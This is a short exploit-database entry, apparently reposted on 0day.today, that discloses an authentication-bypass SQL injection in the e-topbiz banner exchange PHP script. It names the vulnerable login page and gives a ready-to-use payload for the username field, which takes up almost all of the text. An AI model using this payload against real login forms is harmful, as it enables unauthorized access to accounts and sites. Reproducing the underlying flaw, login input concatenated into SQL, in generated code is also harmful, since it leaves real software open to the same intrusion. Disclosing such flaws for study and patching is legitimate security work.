id: 10506
date: 12/30/2009
title: e-topbiz banner exchange php (Auth Bypass) SQL Injection Vulnerability
author: Hussin X
cves: 

======================================================================
e-topbiz banner exchange php (Auth Bypass) SQL Injection Vulnerability
======================================================================

 
script    : http://e-topbiz.com/oprema/pages/banner1.php
 
_____
 
ExploiT
_______
 
user : test11 ' or ' 1=1
pass: hussin-X
 
# login....



#  0day.today [2023-03-22]  #